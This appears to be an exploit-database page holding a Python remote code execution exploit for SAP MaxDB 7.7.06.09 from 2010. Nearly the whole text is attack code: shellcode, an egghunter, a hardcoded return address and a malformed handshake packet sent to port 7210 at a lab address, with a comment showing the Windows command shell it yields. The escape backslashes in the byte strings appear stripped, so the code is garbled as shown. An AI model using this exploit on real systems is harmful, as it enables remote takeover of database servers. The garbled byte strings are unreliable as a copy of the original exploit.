SAP MaxDB Malformed Handshake Request Remote Code Execution

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SAP MaxDB Malformed Handshake Request Remote Code Execution
# Published : 2010-03-26
# Author : S2 Crew
# Previous Title : HP OpenView NNM OvWebHelp.exe CGI Topic overflow
# Next Title : eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Stack BOF

#!/usr/bin/python

# Exploit title: SAP MaxDB Malformed Handshake Request Remote Code Execution
# Date: 2010.03.26
# Author: S2 Crew [Hungary]
# Software link: sap.com<http://sap.com>
# Version: 7.7.06.09
# Tested on: Windows XP SP2 EN
# CVE: ZDI-10-032
# Code:
#############################################################
# Trying 172.16.29.133...
# Connected to 172.16.29.133.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:sdbdatawrk>
#############################################################

import socket
import sys
import os

sc = (
"x31xc9xdaxdaxbex94x3fxbexeaxb1x56xd9x74x24xf4"
"x5fx31x77x17x03x77x17x83xefxfcx76xcax42x02xff"
"x35xbbxd3x9fxbcx5exe2x8dxdbx2bx57x01xafx7ex54"
"xeaxfdx6axefx9ex29x9cx58x14x0cx93x59x99x90x7f"
"x99xb8x6cx82xcex1ax4cx4dx03x5bx89xb0xecx09x42"
"xbex5fxbdxe7x82x63xbcx27x89xdcxc6x42x4exa8x7c"
"x4cx9fx01x0bx06x07x29x53xb7x36xfex80x8bx71x8b"
"x72x7fx80x5dx4bx80xb2xa1x07xbfx7ax2cx56x87xbd"
"xcfx2dxf3xbdx72x35xc0xbcxa8xb0xd5x67x3ax62x3e"
"x99xefxf4xb5x95x44x73x91xb9x5bx50xa9xc6xd0x57"
"x7ex4fxa2x73x5ax0bx70x1axfbxf1xd7x23x1bx5dx87"
"x81x57x4cxdcxb3x35x19x11x89xc5xd9x3dx9axb6xeb"
"xe2x30x51x40x6ax9exa6xa7x41x66x38x56x6ax96x10"
"x9dx3exc6x0ax34x3fx8dxcaxb9xeax01x9bx15x45xe1"
"x4bxd6x35x89x81xd9x6axa9xa9x33x1dxeex67x67x4d"
"x98x85x97x63x04x03x71xe9xa4x45x29x86x06xb2xe2"
"x31x79x90x5exe9xedxacx88x2dx12x2dx9fx1dxbfx85"
"x48xd6xd3x11x68xe9xfex31xe3xd1x68xcbx9dx90x09"
"xccxb7x43xaax5fx5cx94xa5x43xcbxc3xe2xb2x02x81"
"x1execxbcxb4xe3x68x86x7dx3fx49x09x7fxb2xf5x2d"
"x6fx0axf5x69xdbxc2xa0x27xb5xa4x1ax86x6fx7exf0"
"x40xf8x07x3ax53x7ex08x17x25x9exb8xcex70xa0x74"
"x87x74xd9x69x37x7ax30x2ax47x31x19x1axc0x9cxcb"
"x1fx8dx1ex26x63xa8x9cxc3x1bx4fxbcxa1x1ex0bx7a"
"x59x52x04xefx5dxc1x25x3ax57")

egghunter = (
"x66x81xcaxffx0fx42x52x6a"
"x02x58xcdx2ex3cx05x5ax74"
"xefxb8x54x30x30x57x8bxfa"
"xafx75xeaxafx75xe7xffxe7"
)

host = "172.16.29.133"
port =  7210

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

ret = "x08xf1xa0x00" # HC

packet = (
"x63x00x00x00x03x2fx00x00x01x00x00x00"
"xffxffxffxffx00x00x04x00x63x00x00x00"
"x00x02x4bx00x04x09x00x00x44x20x00x00"
"x00x00x00x00x00x00x00x00xffxffxffxff"
"x6dx61" + ret + "x00x00x00x00x00x00"
"x00x00x00x00x07x49" + "A"*5000 + "T00WT00W" + sc + "x41" * 2500 + egghunter + "x90"*2500)

s.send(packet)
s.close()